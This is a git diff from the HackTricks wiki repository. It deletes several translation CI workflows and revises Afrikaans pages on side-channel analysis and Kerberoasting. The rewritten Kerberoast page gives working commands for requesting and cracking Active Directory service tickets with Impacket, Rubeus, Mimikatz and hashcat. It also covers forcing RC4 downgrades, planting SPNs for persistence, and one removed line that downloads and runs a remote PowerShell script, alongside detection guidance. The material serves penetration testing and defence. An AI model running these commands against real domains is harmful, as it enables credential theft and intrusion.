git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_tr.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to TR (Turkish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: tr
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Turkish
BRANCH: tr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_uk.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to UK (Ukranian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: uk
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Ukranian
BRANCH: uk
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

119
.github/workflows/translate_zh.yml vendored
View File

@ -1,119 +0,0 @@
name: Translator to ZH (Chinese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
workflow_dispatch:
concurrency: zh
permissions:
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
environment: prod
env:
LANGUAGE: Chinese
BRANCH: zh
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: 3.12
- name: Install python dependencies
run: |
python -m pip install --upgrade pip
pip3 install openai tqdm tiktoken
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
- name: Update & install wget & translator.py
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Download language branch #Make sure we have last version
run: |
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git checkout "$BRANCH"
git pull
git checkout master
- name: Run translation script on changed files
run: |
echo "Starting translations"
echo "Commit: $GITHUB_SHA"
# Export the OpenAI API key as an environment variable
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
# Run the translation script on each changed file
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
else
echo "Skipping $file"
fi
done
echo "Translating $(cat /tmp/file_paths.txt)"
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
# Push changes to the repository
- name: Commit and push changes
run: |
git checkout "$BRANCH"
git add -A
git commit -m "Translated $BRANCH files" || true
git push --set-upstream origin "$BRANCH"
# Build the mdBook
- name: Build mdBook
run: mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete

28
src/todo/hardware-hacking/side_channel_analysis.md
View File

@ -2,11 +2,11 @@
{{#include ../../banners/hacktricks-training.md}}
Side-channel aanvalle herstel geheime inligting deur fisiese of mikro-argitektoniese "lek" te observeer wat *gecorreleer* is met die interne toestand, maar *nie* deel is van die logiese koppelvlak van die toestel nie. Voorbeelde wissel van die meting van die onmiddellike stroom wat deur 'n slimkaart getrek word tot die misbruik van CPU-kragbestuurseffekte oor 'n netwerk.
Side-channel aanvalle herstel geheime inligting deur fisiese of mikro-argitektoniese "lekkasies" te observeer wat *gecorreleer* is met die interne toestand, maar *nie* deel is van die logiese koppelvlak van die toestel nie. Voorbeelde wissel van die meting van die onmiddellike stroom wat deur 'n slimkaart getrek word tot die misbruik van CPU-kragbestuurseffekte oor 'n netwerk.
---
## Hoof Lekkanaal
## Hoof Lekkage Kanale
| Kanaal | Tipiese Teiken | Instrumentasie |
|--------|----------------|-----------------|
@ -15,7 +15,7 @@ Side-channel aanvalle herstel geheime inligting deur fisiese of mikro-argitekton
| Uitvoeringstyd / caches | Desktop & wolk CPU's | Hoë-presisie timers (rdtsc/rdtscp), afstand tyd-van-vlug |
| Akoesties / meganies | Sleutelborde, 3-D drukkers, relais | MEMS mikrofoon, laser vibrometer |
| Opties & termies | LED's, laserdrukkers, DRAM | Fotodiode / hoë-snelheid kamera, IR kamera |
| Fout-geïnduseer | ASIC/MCU kripto's | Klok/spanning glip, EMFI, laser inspuiting |
| Fout-geïnduseer | ASIC/MCU kriptos | Klok/spanning glip, EMFI, laser inspuiting |
---
@ -35,7 +35,7 @@ trace = cw.capture.capture_trace()
print(trace.wave) # numpy array of power samples
```
### Differensiële/Korrelerende Kraganalise (DPA/CPA)
Verkry *N > 1 000* spore, hipotese sleutelbyte `k`, bereken HW/HD-model en korreleer met lekkasie.
Verkry *N > 1 000* spore, hipotese sleutelbyte `k`, bereken HW/HD model en korreleer met lekkasie.
```python
import numpy as np
corr = np.corrcoef(leakage_model(k), traces[:,sample])
@ -45,20 +45,16 @@ CPA bly toonaangewend, maar masjienleer variasies (MLA, diep-leer SCA) oorheers
---
## Elektromagnetiese Analise (EMA)
Naby-veld EM-probes (500 MHz3 GHz) lek identiese inligting aan kraganalise *sonder* om shunts in te voeg. 2024 navorsing het sleutelherwinning by **>10 cm** van 'n STM32 gedemonstreer deur middel van spektrum korrelasie en laekoste RTL-SDR voorfront.
Naby-veld EM-probes (500 MHz3 GHz) lek identiese inligting aan kraganalise *sonder* om shunts in te voeg. 2024 navorsing het sleutelherwinning by **>10 cm** van 'n STM32 gedemonstreer deur middel van spektrum korrelasie en laekoste RTL-SDR front-ends.
---
## Tyds- & Mikro-argitektoniese Aanvalle
Moderne CPU's lek geheime deur gedeelde hulpbronne:
* **Hertzbleed (2022)** DVFS frekwensie skaal korreleer met Hamming gewig, wat *afgeleë* ekstraksie van EdDSA sleutels moontlik maak.
* **Downfall / Gather Data Sampling (Intel, 2023)** tydelike uitvoering om AVX-gather data oor SMT-drade te lees.
* **Downfall / Gather Data Sampling (Intel, 2023)** transiënt-uitvoering om AVX-gather data oor SMT-drade te lees.
* **Zenbleed (AMD, 2023) & Inception (AMD, 2023)** spekulatiewe vektor misvoorspelling lek registers oor domeine.
Vir 'n breë behandeling van Spectre-klas kwessies, sien {{#ref}}
../../cpu-microarchitecture/microarchitectural-attacks.md
{{#endref}}
---
## Akoestiese & Optiese Aanvalle
@ -67,15 +63,15 @@ Vir 'n breë behandeling van Spectre-klas kwessies, sien {{#ref}}
---
## Foutinjeksie & Differensiële Foutanalise (DFA)
Die kombinasie van foute met kantkanaallek versnel sleutelsoektog (bv. 1-trace AES DFA). Onlangse stokperdjiegereedskap:
## Foutinjekie & Differensiële Foutanalise (DFA)
Die kombinasie van foute met kant-kanaal lekkasie verkort sleutelsoektog (bv. 1-trace AES DFA). Onlangs hobbyis-prys gereedskap:
* **ChipSHOUTER & PicoEMP** sub-1 ns elektromagnetiese puls glits.
* **GlitchKit-R5 (2025)** oopbron klok/spanning glits platform wat RISC-V SoCs ondersteun.
---
## Tipiese Aanval Werkvloei
1. Identifiseer lek kanaal & monteerpunt (VCC pen, ontkoppelkap, naby-veld plek).
1. Identifiseer lekkasie kanaal & monteerpunt (VCC pen, ontkoppelkap, naby-veld plek).
2. Voeg trigger in (GPIO of patroon-gebaseerd).
3. Versamel >1 k spore met behoorlike monsterneming/filters.
4. Voorverwerk (uitlijning, gemiddelde verwydering, LP/HP filter, golflet, PCA).
@ -86,16 +82,16 @@ Die kombinasie van foute met kantkanaallek versnel sleutelsoektog (bv. 1-trace A
## Verdedigings & Versterking
* **Konstante-tyd** implementasies & geheue-harde algoritmes.
* **Maskering/suddeling** verdeel geheime in ewekansige aandele; eerste-orde weerstand gesertifiseer deur TVLA.
* **Maskering/schuffling** verdeel geheime in ewekansige aandele; eerste-orde weerstand gesertifiseer deur TVLA.
* **Versteek** op-skyf spanning reguleerders, ewekansige klok, dubbele spoor logika, EM skilde.
* **Foutdetectie** oortollige berekening, drempel handtekeninge.
* **Operasioneel** deaktiveer DVFS/turbo in crypto-kernels, isoleer SMT, verbied medekolokasie in multi-huurder wolke.
* **Operasioneel** deaktiveer DVFS/turbo in kripto-kernels, isoleer SMT, verbied mede-lokasie in multi-huurder wolke.
---
## Gereedskap & Raamwerke
* **ChipWhisperer-Husky** (2024) 500 MS/s skoop + Cortex-M trigger; Python API soos hierbo.
* **Riscure Inspector & FI** kommersieel, ondersteun outomatiese lek assessering (TVLA-2.0).
* **Riscure Inspector & FI** kommersieel, ondersteun outomatiese lekkasie assessering (TVLA-2.0).
* **scaaml** TensorFlow-gebaseerde diep-leer SCA biblioteek (v1.2 2025).
* **pyecsca** ANSSI oopbron ECC SCA raamwerk.

337
src/windows-hardening/active-directory-methodology/kerberoast.md
View File

@ -4,172 +4,215 @@
## Kerberoast
Kerberoasting fokus op die verkryging van **TGS tickets**, spesifiek dié wat verband hou met dienste wat onder **gebruikersrekeninge** in **Active Directory (AD)** werk, met uitsluiting van **rekeninge van rekenaars**. Die kodering van hierdie tickets gebruik sleutels wat afkomstig is van **gebruikerswagte**, wat die moontlikheid van **offline geloofsbrief kraking** toelaat. Die gebruik van 'n gebruikersrekening as 'n diens word aangedui deur 'n nie-leë **"ServicePrincipalName"** eienskap.
Kerberoasting fokus op die verkryging van TGS-kaarte, spesifiek dié wat verband hou met dienste wat onder gebruikersrekeninge in Active Directory (AD) werk, met uitsluiting van rekeninge van rekenaars. Die kodering van hierdie kaarte gebruik sleutels wat afkomstig is van gebruikerswagwoorde, wat offline geloofsbriewe kraken moontlik maak. Die gebruik van 'n gebruikersrekening as 'n diens word aangedui deur 'n nie-leë ServicePrincipalName (SPN) eienskap.
Vir die uitvoering van **Kerberoasting** is 'n domeinrekening wat in staat is om **TGS tickets** aan te vra, noodsaaklik; egter, hierdie proses vereis nie **spesiale voorregte** nie, wat dit toeganklik maak vir enigiemand met **geldige domein geloofsbriewe**.
Enige geverifieerde domein gebruiker kan TGS-kaarte aan vra, so geen spesiale voorregte is nodig nie.
### Sleutelpunte:
### Sleutelpunte
- **Kerberoasting** teiken **TGS tickets** vir **gebruikersrekening dienste** binne **AD**.
- Tickets wat met sleutels van **gebruikerswagte** gekodeer is, kan **offline gekraak** word.
- 'n Diens word geïdentifiseer deur 'n **ServicePrincipalName** wat nie null is nie.
- **Geen spesiale voorregte** is nodig nie, net **geldige domein geloofsbriewe**.
### **Aanval**
- Teikens TGS-kaarte vir dienste wat onder gebruikersrekeninge loop (d.w.s. rekeninge met SPN ingestel; nie rekenaarrekeninge nie).
- Kaarte is gekodeer met 'n sleutel wat afgelei is van die diensrekening se wagwoord en kan offline gekraak word.
- Geen verhoogde voorregte vereis nie; enige geverifieerde rekening kan TGS-kaarte aan vra.
> [!WARNING]
> **Kerberoasting gereedskap** vra tipies **`RC4 kodering`** aan wanneer die aanval uitgevoer word en TGS-REQ versoeke geïnisieer word. Dit is omdat **RC4 is** [**swakker**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795) en makliker om offline te kraak met gereedskap soos Hashcat as ander kodering algoritmes soos AES-128 en AES-256.\
> RC4 (tipe 23) hashes begin met **`$krb5tgs$23$*`** terwyl AES-256 (tipe 18) begin met **`$krb5tgs$18$*`**.`
> Boonop, wees versigtig omdat `Rubeus.exe kerberoast` versoeke outomaties oor AL die kwesbare rekeninge doen wat jou sal laat opval. Vind eers kerberoastable gebruikers met interessante voorregte en voer dit dan slegs oor hulle uit.
```bash
> Meeste openbare gereedskap verkies om RC4-HMAC (etype 23) dienskaarte aan te vra omdat hulle vinniger gekraak kan word as AES. RC4 TGS-hashes begin met `$krb5tgs$23$*`, AES128 met `$krb5tgs$17$*`, en AES256 met `$krb5tgs$18$*`. egter, baie omgewings beweeg na slegs AES. Moet nie aanvaar dat slegs RC4 relevant is nie.
> Vermy ook "spray-and-pray" roasting. Rubeus se standaard kerberoast kan alle SPNs opvra en kaarte aan vra en is luidrugtig. Enumereer en teiken eers interessante principals.
#### **Linux**
```bash
# Metasploit raamwerk
msf> gebruik auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Wag vir wagwoord
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable gebruikers
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
```
Multi-features tools including a dump of kerberoastable users:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
```
#### Windows
- **Enumerate Kerberoastable users**
```bash
# Kry Kerberoastable gebruikers
setspn.exe -Q */* #Dit is 'n ingeboude binêre. Fokus op gebruikersrekeninge
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats
```
- **Technique 1: Ask for TGS and dump it from memory**
```bash
#Kry TGS in geheue van 'n enkele gebruiker
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Voorbeeld: MSSQLSvc/mgmt.domain.local
#Kry TGS's vir ALLE kerberoastable rekeninge (PC's ingesluit, nie regtig slim nie)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
#Lys kerberos kaartjies in geheue
klist
# Trek hulle uit geheue
Invoke-Mimikatz -Command '"kerberos::list /export"' #Eksporteer kaartjies na huidige gids
# Transformeer kirbi kaartjie na john
python2.7 kirbi2john.py sqldev.kirbi
# Transformeer john na hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
```
- **Technique 2: Automatic tools**
```bash
# Powerview: Kry Kerberoast-hash van 'n gebruiker
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Gebruik PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Kry alle Kerberoast-hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Spesifieke gebruiker
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Kry van admins
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
> [!WARNING]
> When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
### Cracking
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
### Persistence
If you have **enough permissions** over a user you can **make it kerberoastable**:
```bash
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
```
You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options:
- `ntpdate <IP of DC>` - Deprecated as of Ubuntu 16.04
- `rdate -n <IP of DC>`
### Mitigation
Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities:
- The service name should not be **krbtgt**, as this is a normal request.
- Service names ending with **$** should be excluded to avoid including machine accounts used for services.
- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**.
- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**.
- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks.
```bash
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
```
To mitigate the risk of Kerberoasting:
- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**.
- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks.
By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting.
## Kerberoast w/o domain account
In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT).
The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
> [!WARNING]
> You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
### Aanval
#### Linux
- [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):
```bash
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
```
# Metasploit Framework
msf> use auxiliary/gather/get_user_spns
# Impacket — request and save roastable hashes (prompts for password)
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# With NT hash
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# Target a specific users SPNs only (reduce noise)
GetUserSPNs.py -request-user <samAccountName> -dc-ip <DC_IP> <DOMAIN>/<USER>
# kerberoast by @skelsec (enumerate and roast)
# 1) Enumerate kerberoastable users via LDAP
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -o kerberoastable
# 2) Request TGS for selected SPNs and dump
kerberoast spnroast 'kerberos+password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes
```
Multi-funksie gereedskap insluitend kerberoast kontroles:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN> -ip <DC_IP> -u <USER> -p <PASS> -c
```
#### Windows
- [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139):
- Enumereer kerberoastable gebruikers
```powershell
# Built-in
setspn.exe -Q */* # Focus on entries where the backing object is a user, not a computer ($)
```bash
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
# PowerView
Get-NetUser -SPN | Select-Object serviceprincipalname
# Rubeus stats (AES/RC4 coverage, pwd-last-set years, etc.)
.\Rubeus.exe kerberoast /stats
```
- Tegniek 1: Vra vir TGS en dump uit geheue
```powershell
# Acquire a single service ticket in memory for a known SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>" # e.g. MSSQLSvc/mgmt.domain.local
# Get all cached Kerberos tickets
klist
# Export tickets from LSASS (requires admin)
Invoke-Mimikatz -Command '"kerberos::list /export"'
# Convert to cracking formats
python2.7 kirbi2john.py .\some_service.kirbi > tgs.john
# Optional: convert john -> hashcat etype23 if needed
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*$\2/' tgs.john > tgs.hashcat
```
- Tegniek 2: Outomatiese gereedskap
```powershell
# PowerView — single SPN to hashcat format
Request-SPNTicket -SPN "<SPN>" -Format Hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
# PowerView — all user SPNs -> CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
# Rubeus — default kerberoast (be careful, can be noisy)
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
# Rubeus — target a single account
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast
# Rubeus — target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
```
> [!WARNING]
> 'n TGS-versoek genereer Windows-sekuriteitsgebeurtenis 4769 (Daar is 'n Kerberos-dienskaartjie aangevra).
### OPSEC en AES-slegs omgewings
- Versoek RC4 op doel vir rekeninge sonder AES:
- Rubeus: `/rc4opsec` gebruik tgtdeleg om rekeninge sonder AES te lys en versoek RC4-dienskaartjies.
- Rubeus: `/tgtdeleg` met kerberoast aktiveer ook RC4 versoeke waar moontlik.
- Rooster AES-slegs rekeninge eerder as om stilweg te misluk:
- Rubeus: `/aes` lys rekeninge met AES geaktiveer en versoek AES-dienskaartjies (etype 17/18).
- As jy reeds 'n TGT het (PTT of van 'n .kirbi), kan jy `/ticket:<blob|path>` met `/spn:<SPN>` of `/spns:<file>` gebruik en LDAP oorslaan.
- Teiken, beperk en minder geraas:
- Gebruik `/user:<sam>`, `/spn:<spn>`, `/resultlimit:<N>`, `/delay:<ms>` en `/jitter:<1-100>`.
- Filtreer vir waarskynlik swak wagwoorde met `/pwdsetbefore:<MM-dd-yyyy>` (ouer wagwoorde) of teiken bevoorregte OU's met `/ou:<DN>`.
Voorbeelde (Rubeus):
```powershell
# Kerberoast only AES-enabled accounts
.\Rubeus.exe kerberoast /aes /outfile:hashes.aes
# Request RC4 for accounts without AES (downgrade via tgtdeleg)
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.rc4
# Roast a specific SPN with an existing TGT from a non-domain-joined host
.\Rubeus.exe kerberoast /ticket:C:\\temp\\tgt.kirbi /spn:MSSQLSvc/sql01.domain.local
```
### Kraking
```bash
# John the Ripper
john --format=krb5tgs --wordlist=wordlist.txt hashes.kerberoast
# Hashcat
# RC4-HMAC (etype 23)
hashcat -m 13100 -a 0 hashes.rc4 wordlist.txt
# AES128-CTS-HMAC-SHA1-96 (etype 17)
hashcat -m 19600 -a 0 hashes.aes128 wordlist.txt
# AES256-CTS-HMAC-SHA1-96 (etype 18)
hashcat -m 19700 -a 0 hashes.aes256 wordlist.txt
```
### Volharding / Misbruik
As jy 'n rekening beheer of kan wysig, kan jy dit kerberoastable maak deur 'n SPN by te voeg:
```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='fake/WhateverUn1Que'} -Verbose
```
Verlaag 'n rekening om RC4 in te skakel vir makliker kraak (vereis skryweprivileges op die teikenobjek):
```powershell
# Allow only RC4 (value 4) — very noisy/risky from a blue-team perspective
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=4}
# Mixed RC4+AES (value 28)
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=28}
```
U kan nuttige gereedskap vir kerberoast-aanvalle hier vind: https://github.com/nidem/kerberoast
As u hierdie fout van Linux kry: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` is dit as gevolg van plaaslike tydskew. Sinchroniseer met die DC:
- `ntpdate <DC_IP>` (verouderd op sommige distros)
- `rdate -n <DC_IP>`
### Detectie
Kerberoasting kan stil wees. Jag vir Gebeurtenis ID 4769 van DC's en pas filters toe om geraas te verminder:
- Sluit diensnaam `krbtgt` en diensname wat eindig op `$` (rekenaarrekeninge) uit.
- Sluit versoeke van masjienrekeninge (`*$$@*`) uit.
- Slegs suksesvolle versoeke (Foutkode `0x0`).
- Volg versleutelingstipes: RC4 (`0x17`), AES128 (`0x11`), AES256 (`0x12`). Moet nie net op `0x17` waarsku nie.
Voorbeeld PowerShell triage:
```powershell
